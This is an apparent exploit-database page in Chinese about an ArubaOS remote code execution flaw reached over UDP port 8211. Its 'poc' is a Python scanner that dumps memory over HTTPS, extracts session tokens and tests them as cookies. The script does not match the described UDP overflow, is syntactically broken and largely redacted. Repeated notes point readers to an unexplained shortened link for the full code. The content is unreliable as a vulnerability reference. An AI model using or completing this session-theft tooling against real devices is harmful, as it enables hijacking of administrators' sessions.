ArubaOS远程代码执行漏洞(CVE-2024-26304)

expdb 应用安全 256

描述

底层 L2/L3 管理服务中存在缓冲区溢出漏洞,可能会通过发送发往 PAPI(Aruba 接入点管理协议)UDP 端口 (8211) 的特制数据包,导致未经身份验证的远程代码执行。成功利用此漏洞可以导致以特权用户身份在底层操作系统上执行任意代码。

poc

import re
import sys
import hexdump
import argparse
import requests

from rich.console import Console
from urllib.parse import urlparse
from alive_progress import alive_bar
from typing import List, Tuple, Optional, TextIO
from concurrent.futures import ThreadPoolExecutor, as_completed

warnings = requests.packages.urllib3
warnings.disable_warnings(warnings.exceptions.InsecureRequestWarning)

class ArubaRCE:

def __init__(self):
self.console = Console()
self.parser = argparse.ArgumentParser(description=’ArubaRCE’)
self.setup_arguments()
self.results: List[Tuple[str, str]] = []
self.output_file: Optional[TextIO] = None
if self.args.output:
self.output_file = open(self.args.output, ‘w’)

def setup_arguments(self) -> None:
self.parser.add_argument(‘-u’, ‘–url’, help=’The ArubaRCE / Gateway target (e.g., https://192.168.1.200)’)
self.parser.add_argument(‘-f’, ‘–file’, help=’File containing a list of target URLs (one URL per line)’)
self.parser.add_argument(‘-o’, ‘–output’, help=’File to save the output results’)
self.parser.add_argument(‘-v’, ‘–verbose’, action=’store_true’, help=’Enable verbose mode’)
self.parser.add_argument(‘–only-valid’, action=’store_true’, help=’Only show results with valid sessions’)
self.args = self.parser.parse_args()

def print_results(self, header: str, result: str) -> None:
if self.args.only_valid and “[+]” not in header:
return

formatted_msg = f”{header} {result}”
self.console.print(formatted_msg, style=”white”)
if self.output_file:
self.output_file.write(result + ‘\n’)

def normalize_url(self, url: str) -> str:
if not url.startswith(“http://”) and not url.startswith(“https://”):
url = f”https://{url}”

parsed_url = urlparse(url)
normalized_url = f”{parsed_url.scheme}://{parsed_url.netloc}”
return normalized_url

def dump_memory(self, url: str) -> None:
full_url = self.normalize_url(url)
headers = {
# [REDACTED. Get full code here https://t.ly/C1-D1]
print(“Headers:”, headers)
}

try:
r = requests.get(
f”{full_url}/oauth/redacted”, # [REDACTED. Get full code here https://t.ly/C1-D1]
headers=headers,
verify=False,
timeout=10
)
content_bytes = r.content

if r.status_code == 200 and content_bytes:
# [REDACTED. Get full code here https://t.ly/C1-D1]
print(“Content bytes:”, content_bytes)

except Exception as e:
print(“Error:”, e)

def clean_bytes(self, data: bytes) -> bytes:
# [REDACTED. Get full code here https://t.ly/C1-D1]
print(“Cleaning bytes…”)

def find_session_tokens(self, content_bytes: bytes) -> List[str]:
# [REDACTED. Get full code here https://t.ly/C1-D1]
print(“Finding session tokens…”)

def test_session_cookie(self, url: str, session_token: str) -> bool:
headers = {
“Cookie”: f”[REDACTED. Get full code here https://t.ly/C1-D1]={session_token}”
}
try:
r = requests.post(
# [REDACTED. Get full code here https://t.ly/C1-D1]
)
# [REDACTED. Get full code here https://t.ly/C1-D1]
print(“Session cookie test result:”, result)
return result

except Exception as e:
print(“Error:”, e)
return False

def run(self) -> None:
if self.args.url:
# [REDACTED. Get full code here https://t.ly/C1-D1]
for header, result in self.results:
self.print_results(header, result)
elif self.args.file:
# [REDACTED. Get full code here https://t.ly/C1-D1]
pass # Placeholder for code execution for file processing
else:
self.console.print(“[bold red][-][/bold red] URL or File must be provided.”, style=”white”)
sys.exit(1)

if self.output_file:
self.output_file.close()

if __name__ == “__main__”:
getRCE = ArubaRCE()
getRCE.run()

漏洞来源

 

评论

我来回复
  • 暂无回复内容